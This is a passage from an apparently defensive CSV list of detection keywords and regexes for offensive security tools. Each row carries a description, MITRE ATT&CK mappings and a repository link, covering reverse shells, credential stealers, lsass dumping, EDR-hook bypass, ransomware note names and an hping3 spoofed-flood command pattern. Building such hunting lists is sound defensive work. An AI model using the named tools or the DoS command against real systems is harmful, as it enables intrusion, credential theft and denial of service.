Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*hlldz/RefleXXion*",".{0,1000}hlldz\/RefleXXion.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*hmeobnfnfcmdkdcmlblgagmfpfboieaf*",".{0,1000}hmeobnfnfcmdkdcmlblgagmfpfboieaf.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*hnfanknocfeofbddgcijnmhnfnkdnaad*",".{0,1000}hnfanknocfeofbddgcijnmhnfnkdnaad.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*hoangprod/AndrewSpecial*",".{0,1000}hoangprod\/AndrewSpecial.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*Hoaxshell.exe*",".{0,1000}Hoaxshell\.exe.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*hoaxshell.py*",".{0,1000}hoaxshell\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*hoaxshell-listener.py*",".{0,1000}hoaxshell\-listener\.py.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*holehe *@gmail.com*",".{0,1000}holehe\s.{0,1000}\@gmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*holehe.core:main*",".{0,1000}holehe\.core\:main.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*holehe\holehe*",".{0,1000}holehe\\holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*holehe-master.*",".{0,1000}holehe\-master\..{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*hollow *.exe *.bin*",".{0,1000}hollow\s.{0,1000}\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*hollower.Hollow(*",".{0,1000}hollower\.Hollow\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*home/kali/Downloads*",".{0,1000}home\/kali\/Downloads.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Honey hash*",".{0,1000}Honey\shash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Hook installed in mstsc.exe, PID *",".{0,1000}Hook\sinstalled\sin\smstsc\.exe,\sPID\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*hookedbrowsers.rb*",".{0,1000}hookedbrowsers\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*hook-infection_monkey.exploit.py*",".{0,1000}hook\-infection_monkey\.exploit\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.network.py*",".{0,1000}hook\-infection_monkey\.network\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.post_breach.actions.py*",".{0,1000}hook\-infection_monkey\.post_breach\.actions\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.post_breach.py*",".{0,1000}hook\-infection_monkey\.post_breach\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.ransomware.py*",".{0,1000}hook\-infection_monkey\.ransomware\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-infection_monkey.system_info.collectors.py*",".{0,1000}hook\-infection_monkey\.system_info\.collectors\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*hook-pypsrp.py*",".{0,1000}hook\-pypsrp\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*hook-pypykatz.py*",".{0,1000}hook\-pypykatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*hopefully it's a DA password*",".{0,1000}hopefully\sit\'s\sa\sDA\spassword.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*'Host the Phising App'*",".{0,1000}\'Host\sthe\sPhising\sApp\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*HOST/EXEGOL-01.*",".{0,1000}HOST\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Host: FUZZ.machine.org*",".{0,1000}Host\:\sFUZZ\.machine\.org.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*HostEnum.ps1*",".{0,1000}HostEnum\.ps1.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*HostExploiter.py*",".{0,1000}HostExploiter\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*HostingCLR_inject*",".{0,1000}HostingCLR_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*HostingCLRx64.dll*",".{0,1000}HostingCLRx64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*houqingv1.0.zip*",".{0,1000}houqingv1\.0\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*HOW_TO_DECRYPT.txt*",".{0,1000}HOW_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","Hive","Hive ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*HOW_TO_DECYPHER_FILES.txt*",".{0,1000}HOW_TO_DECYPHER_FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*How-to-bypass-UAC-in-newer-Windows-versions.html*",".{0,1000}How\-to\-bypass\-UAC\-in\-newer\-Windows\-versions\.html.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*hpe_sim_76_amf_deserialization*",".{0,1000}hpe_sim_76_amf_deserialization.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hpglfhgfnhbgpjdenjgmdgoeiappafln*",".{0,1000}hpglfhgfnhbgpjdenjgmdgoeiappafln.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*hping2.h*",".{0,1000}hping2\.h.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*hping3 -*",".{0,1000}hping3\s\-.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*hping3 * --flood --frag --spoof * --destport*",".{0,1000}hping3\s.{0,1000}\s\-\-flood\s\-\-frag\s\-\-spoof\s.{0,1000}\s\-\-destport.{0,1000}","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","DOS","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*href=""""/"""">tor2web*",".{0,1000}href\=\""\/\""\>tor2web\<\/a\>.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*HRShell*client.py*",".{0,1000}HRShell.{0,1000}client\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*HRShell*server.py*",".{0,1000}HRShell.{0,1000}server\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*hta_evasion.hta*",".{0,1000}hta_evasion\.hta.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*HtaPowershellGenerator.*",".{0,1000}HtaPowershellGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*hta-to-javascript-crypter*",".{0,1000}hta\-to\-javascript\-crypter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" 